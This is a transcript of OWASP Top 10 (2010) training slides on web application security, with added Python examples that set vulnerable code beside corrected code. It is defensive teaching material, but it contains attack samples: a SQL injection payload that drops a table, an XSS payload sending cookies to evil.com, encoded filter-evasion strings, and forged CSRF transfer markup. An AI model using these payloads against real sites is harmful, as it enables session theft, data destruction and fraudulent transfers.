
OWASP top 10 - Agenda


axl

Presentation Transcript


  1. OWASP top 10 - Agenda
  • Background
  • Risk based
  • Top 10 items 1 – 6
  • Live demo
  • Top 10 items 7 – 10
  • OWASP resources

  2. The OWASP Guide

  3. Warning
  • Risk analysis
  • Insiders
  • Architecture
  • Modular
  • Clarity
  • SDLC
  • Knowledge
  • Predictability

  4. Top 10 - 2010
  • Injection
  • Cross site scripting (XSS)
  • Broken authentication and session management
  • Insecure direct object reference
  • Cross site request forgery (CSRF)
  • Security misconfiguration
  • Insecure cryptographic storage
  • Failure to restrict URL access
  • Insufficient transport layer protection
  • Unvalidated redirects and forwards

  5. A1 – Injection Client Appl DB Shell Pgm CPU

  6. A1 – Injection
     String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";
     id="foo"                  →  SELECT * FROM accnts WHERE ID='foo';
     id="foo';DROP accnts;--"  →  SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
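The slide's concatenated query, run against a throwaway SQLite database, next to the parameterised form (a PreparedStatement in the slide's Java). This is an added example written in Python for this transcript, not code from the presentation; the table contents are constructed, and the payload is the slide's with DROP spelled out as valid SQL. The vulnerable path uses executescript so that stacked statements run, as they do with drivers that permit several statements per call.

```python
import sqlite3

# Constructed payload: the slide's id value, with "DROP TABLE" as valid SQL.
PAYLOAD = "foo';DROP TABLE accnts;--"


def fresh_db():
    """Build a throwaway in-memory accnts table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accnts (ID TEXT PRIMARY KEY, owner TEXT)")
    conn.executemany("INSERT INTO accnts VALUES (?, ?)",
                     [("foo", "alice"), ("bar", "bob")])
    return conn


def table_exists(conn):
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name='accnts'"
    ).fetchone()
    return row is not None


def run_unsafe(user_id):
    """The slide's string-built query. Returns True if accnts survived the call."""
    conn = fresh_db()
    query = "SELECT * FROM accnts WHERE ID='" + user_id + "'"
    # executescript accepts stacked statements; the attacker's second
    # statement runs with the application's own database privileges.
    conn.executescript(query)
    return table_exists(conn)


def run_safe(user_id):
    """Parameterised query: the id is bound as data, never parsed as SQL.
    Returns (matching rows, True if accnts survived)."""
    conn = fresh_db()
    rows = conn.execute(
        "SELECT ID, owner FROM accnts WHERE ID=?", (user_id,)
    ).fetchall()
    return rows, table_exists(conn)


if __name__ == "__main__":
    print("unsafe, id=foo     table survives:", run_unsafe("foo"))
    print("unsafe, id=payload table survives:", run_unsafe(PAYLOAD))
    print("safe,   id=payload rows, survives :", run_safe(PAYLOAD))
```

With the payload, the parameterised version simply finds no account whose ID literally equals the whole string, and the table is untouched.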

  7. A2 - Cross site scripting (XSS) Browser Appl DB Browser

  8. A2 - Cross site scripting (XSS)
     (String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";
     CC="123456789"  →  <input name='cc' value='123456789'>
     CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>
       →  <input name='cc' value='123456789"><script> window.location=http://evil.com?x=document.cookie </script>'>

  9. A2 - Cross site scripting (XSS)
     < %3C &lt &lt; &LT &LT; &#60 &#060 &#60; &#x003c &#X3c &#x3C000003C; \x3c \x3C \u003c \u003C
     <img src=http://site.com onmouseover=
     <body onload=
     <IMG SRC=j&#X41vascript:alert('test2')>
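Slides 8 and 9 together make one point: the fix is output encoding for the context the value lands in, not a blocklist of attack spellings. The example below is added to this transcript and is not the presentation's code; it is Python rather than the slide's Java, uses html.escape for the attribute context, and double-quotes the attribute so the slide's payload lines up with the quoting (an assumption for the demo). Both payloads are the ones shown on the slides.

```python
import html

# Constructed inputs: the two payloads that appear on slides 8 and 9.
SLIDE_PAYLOAD = ('123456789"><script>window.location='
                 'http://evil.com?x=document.cookie</script>')
IMG_PAYLOAD = "<IMG SRC=j&#X41vascript:alert('test2')>"


def render_unsafe(cc):
    """The slide's concatenation: user input pasted straight into markup."""
    return '<input name="cc" type="TEXT" value="' + cc + '">'


def render_safe(cc):
    """Encode for the HTML attribute context before concatenating.
    quote=True also converts the quote characters, so the value cannot close the attribute."""
    return '<input name="cc" type="TEXT" value="' + html.escape(cc, quote=True) + '">'


def naive_filter_ok(value):
    """A blocklist on one spelling of the attack, for comparison.
    It catches the slide-8 payload and misses the slide-9 one."""
    return "<script" not in value.lower()


def tag_openers(markup):
    """Count raw '<' characters: a correctly encoded field contains exactly one."""
    return markup.count("<")


def round_trips(value):
    """Encoding is lossless: the browser decodes the entities back to the original text."""
    return html.unescape(html.escape(value, quote=True)) == value
```

The encoded field keeps the attacker's text as data (the browser shows it as the value of the input), while the blocklist passes the second payload untouched because it never contains the string it looks for.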

  10. A3 - Broken authentication and session management
  • Unpredictable passwords, session IDs, security questions
  • No session IDs/credentials in URLs
  • Avoid session fixation
  • Session timeouts & logout buttons
  • Different session IDs outside/inside TLS
  • No clear-text passwords
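Three of the bullets (unpredictable session IDs, no session fixation, timeouts and logout) fit in one small session store. The following is an added Python example, not code from the presentation; the timeout value and the in-memory dictionary are constructed for the demo, and a real deployment would also bind the cookie with Secure and HttpOnly as slide 16 says.

```python
import secrets

IDLE_TIMEOUT_SECONDS = 15 * 60   # constructed policy value


class SessionStore:
    """In-memory session table keyed by an unguessable ID (constructed demo)."""

    def __init__(self):
        self._sessions = {}

    @staticmethod
    def _new_id():
        # 256 bits from the OS CSPRNG: not derivable from time, user name or a counter.
        return secrets.token_urlsafe(32)

    def create(self, now):
        """Anonymous pre-login session, as issued on first visit."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "last_seen": now}
        return sid

    def login(self, sid, user, now):
        """Issue a fresh ID on authentication: an ID planted before login
        (session fixation) never becomes a logged-in session."""
        self._sessions.pop(sid, None)
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "last_seen": now}
        return new_sid

    def user_for(self, sid, now):
        """Resolve a session, expiring it once idle longer than the timeout."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[sid]
            return None
        entry["last_seen"] = now
        return entry["user"]

    def logout(self, sid):
        """Server-side invalidation; deleting the cookie alone is not enough."""
        self._sessions.pop(sid, None)


def fixation_scenario():
    """Someone plants a known ID, the victim logs in with it, the planted ID is
    then tried. Returns (user seen via planted ID, user seen via rotated ID)."""
    store = SessionStore()
    planted = store.create(now=0)
    victim_sid = store.login(planted, "alice", now=1)
    return store.user_for(planted, now=2), store.user_for(victim_sid, now=2)
```

Because the ID is rotated at login, knowing the pre-login ID is worthless, and because every lookup refreshes last_seen, idle sessions expire without a background sweep.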

  11. A4 - Insecure direct object references
     <SELECT name=period>
       <OPTION>2010q1</OPTION>
       <OPTION>2011q2</OPTION>
     </SELECT>
     period=2011q2
     period=2011q3

  12. A5 - Cross-site request forgery (CSRF)
     <img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
     <body onload="document.forms[0].submit()">
     <form method="POST" action="https://bank.com/fn">
        <input type="hidden" name="sp" value="8109"/>
     </form>
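A server-side handler for the slide's transferFunds action with a per-session synchroniser token, added here as a Python example that is not part of the presentation. The token store, session identifier and request dictionaries are constructed; the forged request carries the slide's parameters and, like any request a third-party page triggers, no token.

```python
import hmac
import secrets

# Constructed store: one anti-CSRF token per authenticated session.
_TOKENS = {}


def issue_token(session_id):
    """Generate the token the server embeds as a hidden field in its own form."""
    token = secrets.token_urlsafe(32)
    _TOKENS[session_id] = token
    return token


def transfer_funds(session_id, form):
    """Handler for transferFunds. Returns (HTTP status, message).

    The browser attaches the session cookie to every request, including the
    ones the slide's <img> and auto-submitted form trigger, so the cookie
    proves nothing about which page built the request. The token does: a
    cross-site page cannot read it out of the bank's own form."""
    expected = _TOKENS.get(session_id)
    supplied = form.get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected, supplied):
        return 403, "csrf token missing or invalid"
    return 200, f"transferred {form['amount']} to {form['destinationAccount']}"


def demo():
    """Forged request from the slide versus the bank's own form. Returns both statuses."""
    sid = "victim-session"                                                # constructed
    forged = {"amount": "1500", "destinationAccount": "attackersAcct"}   # slide's parameters
    genuine = dict(forged, csrf_token=issue_token(sid))
    return transfer_funds(sid, forged)[0], transfer_funds(sid, genuine)[0]
```

hmac.compare_digest keeps the comparison constant-time; a SameSite cookie attribute is a useful second layer, but the token check is the one the server can enforce regardless of browser.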

  13. A6 - Security misconfiguration
  • Patching
    • OS
    • Application
    • Frameworks / libraries
  • Disable unnecessary services
  • Stack traces
  • Configuration

  14. A7 - Insecure cryptographic storage
  • Keep track of sensitive data
  • Passwords one-way hashed & salted
  • Password/key management
  • TLS key passphrase
  • M2M passwords (obfuscation)
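"One-way hashed & salted" in code: an added Python example, not from the presentation, using PBKDF2-HMAC-SHA256 from the standard library. The iteration count and storage format are constructed choices for the demo; the point is a fresh random salt per password, a deliberately slow derivation, and a constant-time comparison.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # constructed; raise to what your login latency budget allows


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'.
    A new 16-byte salt from the OS CSPRNG is drawn for every stored password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    try:
        scheme, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def same_password_differs():
    """Two users with the same password get different records, so a stolen
    table cannot be attacked with one precomputed lookup for both."""
    return hash_password("correct horse") != hash_password("correct horse")
```

Storing the iteration count with the record lets you raise it later and re-hash on the user's next successful login without a migration.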

  15. A8 - Failure to restrict URL access /user/getAccounts /admin/getAccounts
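Slides 11 and 15 are both access-control failures, one per object (the period value) and one per URL (/user versus /admin). One authorisation layer covers both, shown here as an added Python example that is not the presentation's code: the route table, users and entitlements are constructed, and the request is modelled as (user, path, period).

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str
    periods: frozenset   # reporting periods this user is entitled to (constructed)


# Route-level policy: each URL lists the roles that may call it.
# Anything not listed is denied, so a new /admin/... handler is closed by default.
ROUTE_ROLES = {
    "/user/getAccounts": frozenset({"user", "admin"}),
    "/admin/getAccounts": frozenset({"admin"}),
}


def route_allowed(user, path):
    return user.role in ROUTE_ROLES.get(path, frozenset())


def get_accounts(user, path, period):
    """Returns (HTTP status, body).

    The period that came back from the <SELECT> is checked against the
    user's own entitlements, not against the option list that was rendered:
    the client can send any value, as slide 11's period=2011q3 shows."""
    if not route_allowed(user, path):
        return 403, "forbidden"
    if period not in user.periods:
        return 403, "forbidden"
    return 200, f"{user.name}: accounts for {period}"


# Constructed principals for the demo.
ALICE = User("alice", "user", frozenset({"2010q1", "2011q2"}))
ROOT = User("root", "admin", frozenset({"2010q1", "2011q2", "2011q3"}))
```

Both checks live in the handler, not in the HTML: hiding the /admin link or omitting an option from the menu restricts nothing.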

  16. A9 - Insufficient transport layer protection
  • Use SSL/TLS
  • No mixed content
  • Use secure cookies
  • Example: FireSheep exploits poor solutions

  17. A10 - Unvalidated redirects and forwards
  • http://www.vuln.com/redir.asp?=http://www.links.com
  • http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
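The second URL on the slide is www.google.com percent-encoded, which is why a redirect check must decode before it judges the host. Below is an added Python example for the server side of redir.asp, not code from the presentation: the allowlist holds the slide's own host as a constructed value, and anything else falls back to a local default.

```python
from urllib.parse import unquote, urlsplit

# Constructed allowlist: hosts this application is willing to send users to.
ALLOWED_HOSTS = frozenset({"www.vuln.com"})


def safe_redirect_target(target, default="/"):
    """Turn a user-supplied redirect parameter into a Location the app stands behind.

    Decode first, so %77%77%77... is judged as www..., then allow either a
    root-relative path on this site or an absolute URL to an allowlisted host.
    Everything else, including protocol-relative //host paths, gets the default."""
    decoded = unquote(target)
    parts = urlsplit(decoded)
    if not parts.scheme and not parts.netloc:
        local = (decoded.startswith("/")
                 and not decoded.startswith("//")
                 and not decoded.startswith("/\\"))   # some browsers read /\ as //
        return decoded if local else default
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return decoded
    return default
```

Deny-by-default is what makes this hold up: the check never tries to enumerate bad inputs, it names the few destinations that are acceptable and sends everything else home.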

  18. OWASP resources
  • OWASP Secure Software Contract Annex
  • OWASP Developer’s Guide
  • OWASP Enterprise Security API (ESAPI)
  • OWASP Software Assurance Maturity Model (SAMM)
  • OWASP WebGoat
